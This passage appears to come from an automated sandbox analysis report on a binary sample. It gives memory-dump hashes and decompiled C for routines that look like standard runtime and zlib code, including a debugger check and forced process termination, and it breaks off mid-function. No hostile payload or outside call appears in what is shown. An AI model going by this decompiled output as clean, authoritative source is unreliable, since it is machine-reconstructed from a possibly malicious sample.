                                                                                                                        • Instruction ID: ba3eb77557f69ca633a693b3c0b051b8bcf0f8e1946a3e61bbb9e6c4439807ac
                                                                                                                        • Opcode Fuzzy Hash: 06e36307a39fed8a9c4f12113a6ba5240323eb2cdaddb029f52440e909d3d4b4
                                                                                                                        • Instruction Fuzzy Hash: 0BC0123000E3C84FCB024B3484A84117F688F0311839B04EAE15C9E123C422A8A8C722
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d6cef83b9cf80578866a8bfa8b01976cd91fa68776c365db5f6985022fbd5909
                                                                                                                        • Instruction ID: 1148b0a290cc946acf4d12f7cc830310fe961df4640821f0e765fa01cda1b727
                                                                                                                        • Opcode Fuzzy Hash: d6cef83b9cf80578866a8bfa8b01976cd91fa68776c365db5f6985022fbd5909
                                                                                                                        • Instruction Fuzzy Hash: 3FC0123008A7A68FC3120AE054201903BE8A90323432A08EBC248CA032C6AE48E2C742
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4bd8fb7ba4c7b8bdb4b51b37e9ad4ca4dbc60188d169ce6cbe7e565a3d754d00
                                                                                                                        • Instruction ID: 02ed3d7c18902e6751de5ef5a3ca22267b764c5071cd62f362098e210d53bcbb
                                                                                                                        • Opcode Fuzzy Hash: 4bd8fb7ba4c7b8bdb4b51b37e9ad4ca4dbc60188d169ce6cbe7e565a3d754d00
                                                                                                                        • Instruction Fuzzy Hash: A4D09274E0A1648FC764DB18E85969CB7B1FB4C210F0041E5980EA3258CA746D808F40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 84cca13a6d6053d9ed5c62c7df6730aa9bcbd826d1efbc0e4b35cb86a63298a3
                                                                                                                        • Instruction ID: b349250fba7dfc443687235f749eab030f79419ced3a1044b2d5e4882642ce5a
                                                                                                                        • Opcode Fuzzy Hash: 84cca13a6d6053d9ed5c62c7df6730aa9bcbd826d1efbc0e4b35cb86a63298a3
                                                                                                                        • Instruction Fuzzy Hash: C6C08C34544068CBC3105A08E889298B260B308711F0048F2D042A2286C2358C808B80
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.616948942.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: false

                                                                                                                        Non-executed Functions

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E00415C0B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                        				intOrPtr _v0;
                                                                                                                        				void* _v804;
                                                                                                                        				intOrPtr _v808;
                                                                                                                        				intOrPtr _v812;
                                                                                                                        				intOrPtr _t6;
                                                                                                                        				intOrPtr _t11;
                                                                                                                        				intOrPtr _t12;
                                                                                                                        				intOrPtr _t13;
                                                                                                                        				long _t17;
                                                                                                                        				intOrPtr _t21;
                                                                                                                        				intOrPtr _t22;
                                                                                                                        				intOrPtr _t25;
                                                                                                                        				intOrPtr _t26;
                                                                                                                        				intOrPtr _t27;
                                                                                                                        				intOrPtr* _t31;
                                                                                                                        				void* _t34;
                                                                                                                        
                                                                                                                        				_t27 = __esi;
                                                                                                                        				_t26 = __edi;
                                                                                                                        				_t25 = __edx;
                                                                                                                        				_t22 = __ecx;
                                                                                                                        				_t21 = __ebx;
                                                                                                                        				_t6 = __eax;
                                                                                                                        				_t34 = _t22 -  *0x4228b4; // 0xb87af74f
                                                                                                                        				if(_t34 == 0) {
                                                                                                                        					asm("repe ret");
                                                                                                                        				}
                                                                                                                        				 *0x423fa0 = _t6;
                                                                                                                        				 *0x423f9c = _t22;
                                                                                                                        				 *0x423f98 = _t25;
                                                                                                                        				 *0x423f94 = _t21;
                                                                                                                        				 *0x423f90 = _t27;
                                                                                                                        				 *0x423f8c = _t26;
                                                                                                                        				 *0x423fb8 = ss;
                                                                                                                        				 *0x423fac = cs;
                                                                                                                        				 *0x423f88 = ds;
                                                                                                                        				 *0x423f84 = es;
                                                                                                                        				 *0x423f80 = fs;
                                                                                                                        				 *0x423f7c = gs;
                                                                                                                        				asm("pushfd");
                                                                                                                        				_pop( *0x423fb0);
                                                                                                                        				 *0x423fa4 =  *_t31;
                                                                                                                        				 *0x423fa8 = _v0;
                                                                                                                        				 *0x423fb4 =  &_a4;
                                                                                                                        				 *0x423ef0 = 0x10001;
                                                                                                                        				_t11 =  *0x423fa8; // 0x0
                                                                                                                        				 *0x423ea4 = _t11;
                                                                                                                        				 *0x423e98 = 0xc0000409;
                                                                                                                        				 *0x423e9c = 1;
                                                                                                                        				_t12 =  *0x4228b4; // 0xb87af74f
                                                                                                                        				_v812 = _t12;
                                                                                                                        				_t13 =  *0x4228b8; // 0x478508b0
                                                                                                                        				_v808 = _t13;
                                                                                                                        				 *0x423ee8 = IsDebuggerPresent();
                                                                                                                        				_push(1);
                                                                                                                        				E00416230(_t14);
                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                        				_t17 = UnhandledExceptionFilter(0x42039c);
                                                                                                                        				if( *0x423ee8 == 0) {
                                                                                                                        					_push(1);
                                                                                                                        					E00416230(_t17);
                                                                                                                        				}
                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00418DE5
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418DFA
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0042039C), ref: 00418E05
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00418E21
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00418E28
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2579439406-0
                                                                                                                        • Opcode ID: 56316a485f7f49f80a122dd7e2d7825b1c7d3aabd412730b4c78653adcbd4640
                                                                                                                        • Instruction ID: c266609a22928a924db8473a7985c3b1ca08b1be84fc197e68db2b31327a9059
                                                                                                                        • Opcode Fuzzy Hash: 56316a485f7f49f80a122dd7e2d7825b1c7d3aabd412730b4c78653adcbd4640
                                                                                                                        • Instruction Fuzzy Hash: 5A21C5B4B10204EFD720DF14FA496857BB1FB1C316F92407AE40887360E7B896868F4D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004154E1() {
                                                                                                                        
                                                                                                                        				SetUnhandledExceptionFilter(E0041549F);
                                                                                                                        				return 0;
                                                                                                                        			}




                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001549F), ref: 004154E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 9d8b197145226623f431b53aaf42b2836c73555caff4a8fd8822d7c765ac5632
                                                                                                                        • Instruction ID: fd73bd039d4ba1dd9c7af2bdade5593518066e7e5ed1b3f7d656c54c6f944c5a
                                                                                                                        • Opcode Fuzzy Hash: 9d8b197145226623f431b53aaf42b2836c73555caff4a8fd8822d7c765ac5632
                                                                                                                        • Instruction Fuzzy Hash: F29002B82516409A469157706D0A7CA29919A8C61375144A56136C4064DBA441C4565E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 83%
                                                                                                                        			E00408980(intOrPtr* __eax) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				intOrPtr* _t57;
                                                                                                                        				char* _t60;
                                                                                                                        				char _t62;
                                                                                                                        				intOrPtr _t63;
                                                                                                                        				char _t64;
                                                                                                                        				intOrPtr _t65;
                                                                                                                        				intOrPtr _t66;
                                                                                                                        				intOrPtr _t67;
                                                                                                                        				intOrPtr _t69;
                                                                                                                        				intOrPtr _t70;
                                                                                                                        				intOrPtr _t74;
                                                                                                                        				intOrPtr _t79;
                                                                                                                        				intOrPtr _t82;
                                                                                                                        				intOrPtr* _t83;
                                                                                                                        				void* _t86;
                                                                                                                        				char* _t88;
                                                                                                                        				char* _t89;
                                                                                                                        				intOrPtr* _t91;
                                                                                                                        				intOrPtr* _t93;
                                                                                                                        				signed int _t97;
                                                                                                                        				signed int _t98;
                                                                                                                        				void* _t100;
                                                                                                                        				void* _t101;
                                                                                                                        				void* _t102;
                                                                                                                        				void* _t103;
                                                                                                                        				void* _t104;
                                                                                                                        
                                                                                                                        				_t98 = _t97 | 0xffffffff;
                                                                                                                        				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                        				_t91 = __eax;
                                                                                                                        				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                        				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                        					__eflags = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t93 = E0040DFE9(0, _t86, __eax, 0x74);
                                                                                                                        					_t101 = _t100 + 4;
                                                                                                                        					if(_t93 == 0) {
                                                                                                                        						L31:
                                                                                                                        						return 0;
                                                                                                                        					} else {
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                        						 *_t93 = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                        						 *(_t93 + 0x6c) = _t98;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x4c)) = E00406250(0, 0, 0);
                                                                                                                        						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                        						_t102 = _t101 + 0xc;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                        						_t87 = _t57 + 1;
                                                                                                                        						do {
                                                                                                                        							_t82 =  *_t57;
                                                                                                                        							_t57 = _t57 + 1;
                                                                                                                        						} while (_t82 != 0);
                                                                                                                        						_t60 = E0040DFE9(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                        						_t103 = _t102 + 4;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                        						if(_t60 == 0) {
                                                                                                                        							L30:
                                                                                                                        							E00408330(0, _t87, _t93);
                                                                                                                        							goto L31;
                                                                                                                        						} else {
                                                                                                                        							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                        							_t88 = _t60;
                                                                                                                        							goto L7;
                                                                                                                        							L9:
                                                                                                                        							L9:
                                                                                                                        							if( *_t91 == 0x72) {
                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                        							}
                                                                                                                        							_t63 =  *_t91;
                                                                                                                        							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                        							}
                                                                                                                        							_t64 =  *_t91;
                                                                                                                        							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                        								__eflags = _t64 - 0x66;
                                                                                                                        								if(_t64 != 0x66) {
                                                                                                                        									__eflags = _t64 - 0x68;
                                                                                                                        									if(_t64 != 0x68) {
                                                                                                                        										__eflags = _t64 - 0x52;
                                                                                                                        										if(_t64 != 0x52) {
                                                                                                                        											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                        											 *_t89 = _t64;
                                                                                                                        											_t87 = _t89 + 1;
                                                                                                                        											__eflags = _t87;
                                                                                                                        											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                        										} else {
                                                                                                                        											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								_t98 = _t64 - 0x30;
                                                                                                                        							}
                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                        							if(_t64 == 0) {
                                                                                                                        								goto L26;
                                                                                                                        							}
                                                                                                                        							_t87 = _t103 + 0x68;
                                                                                                                        							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                        								goto L9;
                                                                                                                        							}
                                                                                                                        							L26:
                                                                                                                        							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                        							if(_t65 == 0) {
                                                                                                                        								goto L30;
                                                                                                                        							} else {
                                                                                                                        								if(_t65 != 0x77) {
                                                                                                                        									_t66 = E0040DFE9(0, _t87, _t91, 0x4000);
                                                                                                                        									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                        									 *_t93 = _t66;
                                                                                                                        									_t67 = E0040A370(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                        									_t104 = _t103 + 0x14;
                                                                                                                        									__eflags = _t67;
                                                                                                                        									if(_t67 != 0) {
                                                                                                                        										goto L30;
                                                                                                                        									} else {
                                                                                                                        										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                        										if(__eflags == 0) {
                                                                                                                        											goto L30;
                                                                                                                        										} else {
                                                                                                                        											goto L34;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									_push(0x38);
                                                                                                                        									_push("1.2.3");
                                                                                                                        									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                        									_push(8);
                                                                                                                        									_push(0xfffffff1);
                                                                                                                        									_push(8);
                                                                                                                        									_push(_t98);
                                                                                                                        									_push(_t93);
                                                                                                                        									_t91 = E00407EB0();
                                                                                                                        									_t79 = E0040DFE9(0, _t87, _t91, 0x4000);
                                                                                                                        									_t104 = _t103 + 0x24;
                                                                                                                        									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                        									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                        									if(_t91 != 0 || _t79 == 0) {
                                                                                                                        										goto L30;
                                                                                                                        									} else {
                                                                                                                        										L34:
                                                                                                                        										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                        										 *((intOrPtr*)(E0040F27B(__eflags))) = 0;
                                                                                                                        										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                        										__eflags = _t69;
                                                                                                                        										_push(_t104 + 0x18);
                                                                                                                        										if(__eflags >= 0) {
                                                                                                                        											_push(_t69);
                                                                                                                        											_t70 = E0040FC13(0, _t87, _t91, _t93, __eflags);
                                                                                                                        										} else {
                                                                                                                        											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                        											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                        											_t70 = E0040FE5D();
                                                                                                                        										}
                                                                                                                        										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                        										__eflags = _t70;
                                                                                                                        										if(_t70 == 0) {
                                                                                                                        											goto L30;
                                                                                                                        										} else {
                                                                                                                        											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                        											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                        												E004081D0(_t93, 0);
                                                                                                                        												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                        												_t74 = E0040FBA5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                        												__eflags = _t74;
                                                                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                        												return _t93;
                                                                                                                        											} else {
                                                                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                        												return _t93;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							goto L42;
                                                                                                                        							L7:
                                                                                                                        							_t62 =  *_t83;
                                                                                                                        							 *_t88 = _t62;
                                                                                                                        							_t83 = _t83 + 1;
                                                                                                                        							_t88 = _t88 + 1;
                                                                                                                        							if(_t62 != 0) {
                                                                                                                        								goto L7;
                                                                                                                        							} else {
                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                        							}
                                                                                                                        							goto L9;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L42:
                                                                                                                        			}
                                                                                                                        0x00408b4d
                                                                                                                        0x00408b40
                                                                                                                        0x00408b40
                                                                                                                        0x00408b44
                                                                                                                        0x00408b45
                                                                                                                        0x00408b45
                                                                                                                        0x00408b55
                                                                                                                        0x00408b58
                                                                                                                        0x00408b5a
                                                                                                                        0x00000000
                                                                                                                        0x00408b5c
                                                                                                                        0x00408b5c
                                                                                                                        0x00408b60
                                                                                                                        0x00408b75
                                                                                                                        0x00408b7d
                                                                                                                        0x00408b86
                                                                                                                        0x00408b86
                                                                                                                        0x00408b89
                                                                                                                        0x00408b95
                                                                                                                        0x00408b62
                                                                                                                        0x00408b62
                                                                                                                        0x00408b72
                                                                                                                        0x00408b72
                                                                                                                        0x00408b60
                                                                                                                        0x00408b5a
                                                                                                                        0x00408ae6
                                                                                                                        0x00408ab4
                                                                                                                        0x00000000
                                                                                                                        0x00408a30
                                                                                                                        0x00408a30
                                                                                                                        0x00408a32
                                                                                                                        0x00408a34
                                                                                                                        0x00408a35
                                                                                                                        0x00408a38
                                                                                                                        0x00000000
                                                                                                                        0x00408a3a
                                                                                                                        0x00408a3a
                                                                                                                        0x00408a3d
                                                                                                                        0x00000000
                                                                                                                        0x00408a38
                                                                                                                        0x00408a1f
                                                                                                                        0x004089ba
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 004089AE
                                                                                                                          • Part of subcall function 0040DFE9: __FF_MSGBANNER.LIBCMT ref: 0040E00C
                                                                                                                          • Part of subcall function 0040DFE9: __NMSG_WRITE.LIBCMT ref: 0040E013
                                                                                                                          • Part of subcall function 0040DFE9: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00414D74,00000001,00000001,00000001,?,004101FE,00000018,00421158,0000000C,0041028F), ref: 0040E060
                                                                                                                        • _malloc.LIBCMT ref: 00408A12
                                                                                                                        • _malloc.LIBCMT ref: 00408AD6
                                                                                                                        • _malloc.LIBCMT ref: 00408B00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                                        • String ID: 1.2.3
                                                                                                                        • API String ID: 680241177-2310465506
                                                                                                                        • Opcode ID: c1f364bdd0f5c54ca334afac39b52f0f8f4ae775d7ba898e351bec9349bfe9d0
                                                                                                                        • Instruction ID: e578efffc4446aa315e86bee8c4688169254dd15cbb8675e7868d0af5d0618d3
                                                                                                                        • Opcode Fuzzy Hash: c1f364bdd0f5c54ca334afac39b52f0f8f4ae775d7ba898e351bec9349bfe9d0
                                                                                                                        • Instruction Fuzzy Hash: 36612670A447418FC7309F69898062BFBE0BB55314F504D3FE1C6A3B81DB79A44A8F5A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E0040EF7C(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                        				signed int _v8;
                                                                                                                        				char* _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				signed int _v20;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t90;
                                                                                                                        				intOrPtr* _t92;
                                                                                                                        				signed int _t94;
                                                                                                                        				char _t97;
                                                                                                                        				signed int _t105;
                                                                                                                        				void* _t106;
                                                                                                                        				signed int _t107;
                                                                                                                        				signed int _t110;
                                                                                                                        				signed int _t113;
                                                                                                                        				intOrPtr* _t114;
                                                                                                                        				signed int _t118;
                                                                                                                        				signed int _t119;
                                                                                                                        				signed int _t120;
                                                                                                                        				char* _t121;
                                                                                                                        				signed int _t125;
                                                                                                                        				signed int _t131;
                                                                                                                        				signed int _t133;
                                                                                                                        				void* _t134;
                                                                                                                        
                                                                                                                        				_t125 = __edx;
                                                                                                                        				_t121 = _a4;
                                                                                                                        				_t119 = _a8;
                                                                                                                        				_t131 = 0;
                                                                                                                        				_v12 = _t121;
                                                                                                                        				_v8 = _t119;
                                                                                                                        				if(_a12 == 0 || _a16 == 0) {
                                                                                                                        					L5:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t138 = _t121;
                                                                                                                        					if(_t121 != 0) {
                                                                                                                        						_t133 = _a20;
                                                                                                                        						__eflags = _t133;
                                                                                                                        						if(_t133 == 0) {
                                                                                                                        							L9:
                                                                                                                        							__eflags = _t119 - 0xffffffff;
                                                                                                                        							if(_t119 != 0xffffffff) {
                                                                                                                        								_t90 = E0040E430(_t131, _t121, _t131, _t119);
                                                                                                                        								_t134 = _t134 + 0xc;
                                                                                                                        							}
                                                                                                                        							__eflags = _t133 - _t131;
                                                                                                                        							if(__eflags == 0) {
                                                                                                                        								goto L3;
                                                                                                                        							} else {
                                                                                                                        								_t94 = _t90 | 0xffffffff;
                                                                                                                        								_t125 = _t94 % _a12;
                                                                                                                        								__eflags = _a16 - _t94 / _a12;
                                                                                                                        								if(__eflags > 0) {
                                                                                                                        									goto L3;
                                                                                                                        								}
                                                                                                                        								L13:
                                                                                                                        								_t131 = _a12 * _a16;
                                                                                                                        								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                        								_v20 = _t131;
                                                                                                                        								_t120 = _t131;
                                                                                                                        								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                        									_v16 = 0x1000;
                                                                                                                        								} else {
                                                                                                                        									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                        								}
                                                                                                                        								__eflags = _t131;
                                                                                                                        								if(_t131 == 0) {
                                                                                                                        									L40:
                                                                                                                        									return _a16;
                                                                                                                        								} else {
                                                                                                                        									do {
                                                                                                                        										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                        										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                        											L24:
                                                                                                                        											__eflags = _t120 - _v16;
                                                                                                                        											if(_t120 < _v16) {
                                                                                                                        												_t97 = E00412CF5(_t120, _t125, _t133);
                                                                                                                        												__eflags = _t97 - 0xffffffff;
                                                                                                                        												if(_t97 == 0xffffffff) {
                                                                                                                        													L48:
                                                                                                                        													return (_t131 - _t120) / _a12;
                                                                                                                        												}
                                                                                                                        												__eflags = _v8;
                                                                                                                        												if(_v8 == 0) {
                                                                                                                        													L44:
                                                                                                                        													__eflags = _a8 - 0xffffffff;
                                                                                                                        													if(__eflags != 0) {
                                                                                                                        														E0040E430(_t131, _a4, 0, _a8);
                                                                                                                        														_t134 = _t134 + 0xc;
                                                                                                                        													}
                                                                                                                        													 *((intOrPtr*)(E0040F27B(__eflags))) = 0x22;
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        													L4:
                                                                                                                        													E00411AE6(_t125, _t131, _t133);
                                                                                                                        													goto L5;
                                                                                                                        												}
                                                                                                                        												_t123 = _v12;
                                                                                                                        												_v12 = _v12 + 1;
                                                                                                                        												 *_v12 = _t97;
                                                                                                                        												_t120 = _t120 - 1;
                                                                                                                        												_t70 =  &_v8;
                                                                                                                        												 *_t70 = _v8 - 1;
                                                                                                                        												__eflags =  *_t70;
                                                                                                                        												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                        												goto L39;
                                                                                                                        											}
                                                                                                                        											__eflags = _v16;
                                                                                                                        											if(_v16 == 0) {
                                                                                                                        												_t105 = 0x7fffffff;
                                                                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                                                                        												if(_t120 <= 0x7fffffff) {
                                                                                                                        													_t105 = _t120;
                                                                                                                        												}
                                                                                                                        											} else {
                                                                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                                                                        												if(_t120 <= 0x7fffffff) {
                                                                                                                        													_t55 = _t120 % _v16;
                                                                                                                        													__eflags = _t55;
                                                                                                                        													_t125 = _t55;
                                                                                                                        													_t110 = _t120;
                                                                                                                        												} else {
                                                                                                                        													_t125 = 0x7fffffff % _v16;
                                                                                                                        													_t110 = 0x7fffffff;
                                                                                                                        												}
                                                                                                                        												_t105 = _t110 - _t125;
                                                                                                                        											}
                                                                                                                        											__eflags = _t105 - _v8;
                                                                                                                        											if(_t105 > _v8) {
                                                                                                                        												goto L44;
                                                                                                                        											} else {
                                                                                                                        												_push(_t105);
                                                                                                                        												_push(_v12);
                                                                                                                        												_t106 = E00412CC3(_t125, _t131, _t133);
                                                                                                                        												_pop(_t123);
                                                                                                                        												_push(_t106);
                                                                                                                        												_t107 = E004133E2(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                        												_t134 = _t134 + 0xc;
                                                                                                                        												__eflags = _t107;
                                                                                                                        												if(_t107 == 0) {
                                                                                                                        													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                        													goto L48;
                                                                                                                        												}
                                                                                                                        												__eflags = _t107 - 0xffffffff;
                                                                                                                        												if(_t107 == 0xffffffff) {
                                                                                                                        													L47:
                                                                                                                        													_t80 = _t133 + 0xc;
                                                                                                                        													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                        													__eflags =  *_t80;
                                                                                                                        													goto L48;
                                                                                                                        												}
                                                                                                                        												_v12 = _v12 + _t107;
                                                                                                                        												_t120 = _t120 - _t107;
                                                                                                                        												_v8 = _v8 - _t107;
                                                                                                                        												goto L39;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										_t113 =  *(_t133 + 4);
                                                                                                                        										__eflags = _t113;
                                                                                                                        										if(__eflags == 0) {
                                                                                                                        											goto L24;
                                                                                                                        										}
                                                                                                                        										if(__eflags < 0) {
                                                                                                                        											goto L47;
                                                                                                                        										}
                                                                                                                        										_t131 = _t120;
                                                                                                                        										__eflags = _t120 - _t113;
                                                                                                                        										if(_t120 >= _t113) {
                                                                                                                        											_t131 = _t113;
                                                                                                                        										}
                                                                                                                        										__eflags = _t131 - _v8;
                                                                                                                        										if(_t131 > _v8) {
                                                                                                                        											_t133 = 0;
                                                                                                                        											__eflags = _a8 - 0xffffffff;
                                                                                                                        											if(__eflags != 0) {
                                                                                                                        												E0040E430(_t131, _a4, 0, _a8);
                                                                                                                        												_t134 = _t134 + 0xc;
                                                                                                                        											}
                                                                                                                        											_t114 = E0040F27B(__eflags);
                                                                                                                        											_push(_t133);
                                                                                                                        											_push(_t133);
                                                                                                                        											_push(_t133);
                                                                                                                        											_push(_t133);
                                                                                                                        											 *_t114 = 0x22;
                                                                                                                        											_push(_t133);
                                                                                                                        											goto L4;
                                                                                                                        										} else {
